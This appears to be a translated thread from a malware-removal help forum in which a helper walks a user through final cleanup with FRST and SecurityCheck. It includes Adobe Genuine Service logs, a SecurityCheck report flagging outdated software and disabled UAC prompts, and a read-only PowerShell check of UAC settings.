11/27/22 18:34:22:423 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | Returning from getEndpointAddr: [0]
11/27/22 18:34:22:423 | [ERROR] |  |  |  | AdobeGCIALWrapper |  |  | 12364 | Fetching server URL from dispatch table
11/27/22 18:34:22:423 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | Dispatch table loaded from path: C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\dispatchtable.xml
11/27/22 18:34:22:424 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | (re)load Local Dispatch Table status-[0].
11/27/22 18:34:22:424 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | Scope : [2]
11/27/22 18:34:22:424 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | Setting scope to GM
11/27/22 18:34:22:424 | [INFO] |  |  |  | AdobeGCIALWrapper |  |  | 12364 | AdobeIALClient 1.0 Release (build 1.0.6.3) initializing session...
11/27/22 18:34:22:425 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | EndPoint requested: [ETSEndPoint]
11/27/22 18:34:22:425 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | Length of the URL: [48]
11/27/22 18:34:22:425 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | Returning from getEndpointAddr: [0]
11/27/22 18:34:22:425 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | EndPoint requested: [ETSEndPoint]
11/27/22 18:34:22:425 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | Length of the URL: [48]
11/27/22 18:34:22:425 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | URL found [https://na1e.services.adobe.com/hsmessaging/rest]
11/27/22 18:34:22:425 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | Returning from getEndpointAddr: [0]
11/27/22 18:34:22:425 | [INFO] |  |  |  | AdobeGCClientNSLookup |  |  | 12364 | Delete server domain blocked key
11/27/22 18:34:22:425 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 12364 | Sandbox process request: 3 || ServerDomainBlocked * AdobeGenuineNSLookUpData *  |
11/27/22 18:34:22:667 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 12364 | Sandbox process response: 1 ||
11/27/22 18:34:22:667 | [INFO] |  |  |  | AdobeGCClientNSLookup |  |  | 12364 | Delete server alias blocked key
11/27/22 18:34:22:667 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 12364 | Sandbox process request: 3 || ServerAliasBlocked * AdobeGenuineNSLookUpData *  |
11/27/22 18:34:22:905 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 12364 | Sandbox process response: 1 ||
11/27/22 18:34:22:905 | [INFO] |  |  |  | AdobeGCClientNSLookup |  |  | 12364 | Delete server alias value
11/27/22 18:34:22:905 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 12364 | Sandbox process request: 3 || ServerAlias * AdobeGenuineNSLookUpData *  |
11/27/22 18:34:23:142 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 12364 | Sandbox process response: 1 ||
11/27/22 18:34:23:142 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 12364 | Threaded CFU Started
11/27/22 18:34:23:142 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 12364 | Update call started
11/27/22 18:34:23:143 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 12364 | Suppress Update Flag = 0
11/27/22 18:34:23:143 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 12364 | GC Kill Switch = 0
11/27/22 18:34:23:143 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 12364 | Sandbox process request: 1 || NextUpdateCheckDate * AdobeGenuineWaitTimestamps *  |
11/27/22 18:34:23:378 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 12364 | Sandbox process response: 1 || 1669626942 *  |
11/27/22 18:34:23:378 | [ERROR] |  |  |  | AdobeGCUpdaterCFU |  |  | 12364 | Time flag read
11/27/22 18:34:23:378 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 12364 | LastUpdateCheckDurationPassed from cache 1669626942
11/27/22 18:34:23:378 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 12364 | LastUpdateCheckDurationPassed cached 1669626942 , curr 1669563263 res = 0
11/27/22 18:34:23:378 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 12364 | Suppressing update check for this launch
11/27/22 18:34:23:378 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 12364 | Update call ended
11/27/22 18:34:23:378 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 12364 | GCClient App not being downloaded
11/27/22 18:34:23:378 | [INFO] |  |  |  | AGSService |  |  | 12364 |
11/27/22 18:34:23:378 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 12364 | Threaded CFU Ended
11/27/22 18:34:23:378 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 12364 | Semaphore signalled
11/27/22 18:34:24:204 | [INFO] |  |  |  | AGSService |  |  | 4908 | Thread Finished ...
11/27/22 18:34:25:218 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 4908 | Sandbox process request: 1 || IsPatchingApplicable * AdobeGenuineData *  |
11/27/22 18:34:25:455 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 4908 | Sandbox process response: 3 ||  *  |
11/27/22 18:34:25:455 | [ERROR] |  |  |  | AdobeGCPatchingWrapper |  |  | 4908 | Failed to fetch IsPatchingApplicable. Error: 3
11/27/22 18:34:25:455 | [INFO] |  |  |  | AdobeGCPatchingWrapper |  |  | 4908 | Patching not applicable
11/27/22 18:34:25:455 | [INFO] |  |  |  | AGSService |  |  | 4908 | CreateEvent Done
11/27/22 18:34:25:455 | [INFO] |  |  |  | AGSService |  |  | 4908 | CreateTimerQueue Done
11/27/22 18:34:25:455 | [INFO] |  |  |  | AGSService |  |  | 4908 | CreateTimerQueueTimer Done
11/27/22 18:34:25:455 | [INFO] |  |  |  | AGSService |  |  | 4908 | Call timer routine in 6 hrs...
11/28/22 08:38:34:432 | [INFO] |  |  |  | AGCDirectoryWatcher |  |  | 6656 | Write Operation detected for C:\Users\Public\Documents\AdobeGCData\AdobeNGLAppIDMap.db!
11/28/22 08:38:34:433 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 6656 | Sandbox process request: 1 || IsTargeted * AdobeGenuineData *  |
11/28/22 08:38:34:668 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 6656 | Sandbox process response: 1 || false *  |
11/28/22 08:38:34:668 | [DEBUG] |  |  |  | AGCDirectoryWatcher |  |  | 6656 | Waiting for WRITE operation Callback...
11/28/22 08:38:34:679 | [INFO] |  |  |  | AGCDirectoryWatcher |  |  | 6656 | Write Operation detected for C:\Users\Public\Documents\AdobeGCData\AdobeNGLAppIDMap.db!
11/28/22 08:38:34:679 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 6656 | Sandbox process request: 1 || IsTargeted * AdobeGenuineData *  |
11/28/22 08:38:34:914 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 6656 | Sandbox process response: 1 || false *  |
11/28/22 08:38:34:914 | [DEBUG] |  |  |  | AGCDirectoryWatcher |  |  | 6656 | Waiting for WRITE operation Callback...
11/28/22 09:02:22:900 | [INFO] |  |  |  | AGSService |  |  | 7800 | Retrieving ptr
11/28/22 09:02:22:901 | [INFO] |  |  |  | AGSService |  |  | 7800 | The wait timed out.
11/28/22 09:02:22:901 | [INFO] |  |  |  | AGSService |  |  | 4908 | WaitForSingleObject Done
11/28/22 09:02:22:901 | [INFO] |  |  |  | AGSService |  |  | 4908 | DeleteTimerQueue Done
11/28/22 09:02:22:901 | [ERROR] |  |  |  | AGSService |  |  | 7800 | Caller user name:�������
11/28/22 09:02:22:901 | [ERROR] |  |  |  | AGSService |  |  | 7800 | Started creating entries for uninstaller
11/28/22 09:02:22:901 | [INFO] |  |  |  | AGSService |  |  | 7800 | AdobeGCData folder already exists
11/28/22 09:02:22:901 | [INFO] |  |  |  | AGSService |  |  | 7800 | AdobeGCData folder: checking for junction/symlink
11/28/22 09:02:22:902 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 7800 | GC local storage: Validating permissions of C:\Users\Public\Documents\AdobeGCData
11/28/22 20:31:29:290 | [INFO] |  |  |  | AGSService |  |  | 4712 | CreateEvent Done
11/28/22 20:31:29:290 | [INFO] |  |  |  | AGSService |  |  | 4712 | CreateTimerQueue Done
11/28/22 20:31:29:290 | [INFO] |  |  |  | AGSService |  |  | 4712 | CreateTimerQueueTimer Done
11/28/22 20:31:29:290 | [INFO] |  |  |  | AGSService |  |  | 4712 | Call timer routine in 6 hrs...
 
Some strange logs are being created in the folder C:\Windows\Temp. I can't archive the file named drw-18b8-8ea00f0-fshc.tmp.db and the others, because they are currently in use
because they belong to your Dr.Web Security Space, which creates and uses them.
As I understand it, the problem is solved?
 
I ran the script that thyrex wrote for me and sent the log
let him take a look and say...
I hope the problem is solved (at least, there were no more folders today and Dr.Web didn't complain)
P.S. I'm just being paranoid by now, sorry, it's the end of the working day...
 
The script ran successfully. Of course, do wait for @thyrex's reply as well.
But while you are waiting, carry out the final cleanup steps:

1.
Rename FRST.exe (or FRST64.exe) to uninstall.exe and run it.
The computer will restart.

The remaining cleanup utilities and folders can simply be deleted.

2.
  • Download SecurityCheck by glax24 & Severnyj, save the utility to the Desktop and extract it from the archive.
  • Right-click it and choose Run as administrator from the menu
  • If you see a warning from your firewall or SmartScreen about the SecurityCheck program, do not block it
  • Wait for the scan to finish; a log named SecurityCheck.txt will open in Notepad
  • If you closed Notepad, the file can be found in the root of the system drive in the folder named SecurityCheck, for example C:\SecurityCheck\SecurityCheck.txt
  • Attach this file to your next message.
 

------------------------------- [ Windows ] -------------------------------
Контроль учётных записей пользователя включен
Запрос на повышение прав для администраторов отключен
^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^
--------------------------- [ OtherUtilities ] ----------------------------
Notepad++ (64-bit x64) v.8.1.9.3 Внимание! Скачать обновления
------------------------------ [ ArchAndFM ] ------------------------------
WinRAR 5.91 (64-разрядная) v.5.91.0 Внимание! Скачать обновления
------------------------------- [ Imaging ] -------------------------------
IrfanView 4.57 (64-bit) v.4.57 Внимание! Скачать обновления
FastStone Image Viewer 7.5 v.7.5 Внимание! Скачать обновления
---------------------------- [ ProxyAndVPNs ] -----------------------------
SoftEther VPN Client v.4.38.9760 Внимание! Скачать обновления
--------------------------------- [ P2P ] ---------------------------------
µTorrent v.3.5.5.45852 Внимание! Клиент сети P2P с рекламным модулем!.
-------------------------------- [ Media ] --------------------------------
iTunes v.12.12.2.2 Внимание! Скачать обновления
^Для проверки новой версии используйте приложение Apple Software Update^
AIMP v.v4.70.2239, 22.12.2020 Внимание! Скачать обновления
--------------------------- [ AdobeProduction ] ---------------------------
Adobe Flash Player 9 ActiveX v.9.0.16.0 Данная программа больше не поддерживается разработчиком. Рекомендуется деинсталлировать ее.
------------------------------- [ Browser ] -------------------------------
Brave v.95.1.31.88 Внимание! Скачать обновления
---------------------------- [ UnwantedApps ] -----------------------------
CCleaner v5.66.7705 v.5.66.7705 Внимание! Подозрение на демо-версию антишпионской программы, программу для обновления драйверов, программу-оптимизатор или программу очистки реестра. Рекомендуется деинсталляция и сканирование ПК с помощью Malwarebytes Anti-Malware. Возможно Вы стали жертвой обмана или социальной инженерии. Компьютерные эксперты не рекомендуют использовать такие программы.
Bonjour v.3.1.0.1 Внимание! Приложение распространяется в рамках партнерских программ и сборников-бандлов. Рекомендуется деинсталляция. Возможно Вы стали жертвой обмана или социальной инженерии.


Fix the listed items where possible.
Read the Recommendations after removing malware
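
The first finding in the report above (UAC on, elevation prompt for administrators off) can be confirmed from PowerShell before and after changing the slider. This is an added example, not part of the thread or of SecurityCheck; the function name `Get-UacLevel` is hypothetical, and the sample values are an assumption about which registry state produces those two report lines.

```powershell
# Added example (not from the thread): read-only check of the UAC prompt level.
# The three values live under the Policies\System key and back the slider
# shown by UserAccountControlSettings.
function Get-UacLevel {
    param(
        [int]$EnableLUA,                   # 0 = UAC off, 1 = UAC on
        [int]$ConsentPromptBehaviorAdmin,  # prompt behaviour for administrators
        [int]$PromptOnSecureDesktop        # 1 = prompt on the dimmed secure desktop
    )
    if ($EnableLUA -eq 0) { return 'UAC is disabled (EnableLUA = 0)' }
    switch ($ConsentPromptBehaviorAdmin) {
        0 { return 'Never notify: administrators elevate without any prompt' }
        2 { return 'Always notify' }
        5 {
            if ($PromptOnSecureDesktop -eq 1) { return 'Default level' }
            return 'Notify without dimming the desktop'
        }
        default {
            return "Custom policy value: ConsentPromptBehaviorAdmin = $ConsentPromptBehaviorAdmin"
        }
    }
}

# Constructed sample: values assumed to correspond to the two report lines
# (UAC enabled, elevation prompt for administrators disabled).
Get-UacLevel -EnableLUA 1 -ConsentPromptBehaviorAdmin 0 -PromptOnSecureDesktop 0

# Live check on the current machine; a missing value is treated as 0.
$key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
if (Test-Path $key) {
    $p = Get-ItemProperty -Path $key
    $level = Get-UacLevel -EnableLUA $p.EnableLUA `
        -ConsentPromptBehaviorAdmin $p.ConsentPromptBehaviorAdmin `
        -PromptOnSecureDesktop $p.PromptOnSecureDesktop
    "This machine: $level"
    if ($level -ne 'Default level' -and $level -ne 'Always notify') {
        'Below the default level: restore it in UserAccountControlSettings.'
    }
}
```

With prompting off, anything started from an administrator account is elevated silently, which is why the report asks for the default level to be restored.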
 